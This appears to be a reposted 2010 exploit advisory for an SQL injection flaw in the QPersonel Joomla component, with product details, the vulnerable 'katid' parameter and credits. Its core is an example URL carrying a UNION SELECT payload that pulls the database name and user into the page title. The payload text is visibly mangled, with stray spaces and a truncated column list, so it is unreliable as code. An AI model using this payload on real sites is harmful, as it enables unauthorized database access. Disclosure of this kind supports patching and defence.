Joomla Component QPersonel SQL Injection Vulnerability

Test method:

The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk!
# Exploit Title: Joomla Component QPersonel SQL Injection Vulnerability
# Date: 13.04.2010
# Author: Valentin
# Category: webapps/0day
# Version: XSS security fix from 31.12.2009, 1.02 and before
# Tested on: Debian Lenny, MySQL 5
# CVE:
# Code:
 
 
[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::: :]
|:> General Information
|: Advisory/Exploit Title = Joomla Component QPersonel SQL Injection Vulnerability
|: By = Valentin Hoebel
|: Contact = valentin@xenuser.org
| ::
| ::
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::: :]
| ::>> Product information
|: Name = QPersonel
|: Vendor = Q-PROJE
|: Vendor Website = http://www.qproje.com/
|: Affected Versions = XSS security fix from 31.12.2009, 1.02 and before
| ::
| ::
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::: :]
|: >># 1 Vulnerability
|: Type = SQL Injection
|: Vulnerable File (s) = qpersonel. php
|: Vulnerable Parameter (s) = katid
|: Example URL = index. php? Option = com_qpersonel & task = qpListele & katid = XX + AND + 1 = 2 + UNION + SELECT +, 19,20, concat (database (), user ())--
|: Selected information gets displayed within the title tag.
| ::
| ::
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::: :]
|:> Additional Information
|: Advisory Published = 13.04.2010
| ::
| ::
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::: :]
| ::>> Misc
|: Greetz & Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
| ::
| ::
[:::::::::::::::::::::::::::::::::::::: EOF: :::::::::::::::::::::::::::::::::::::::] //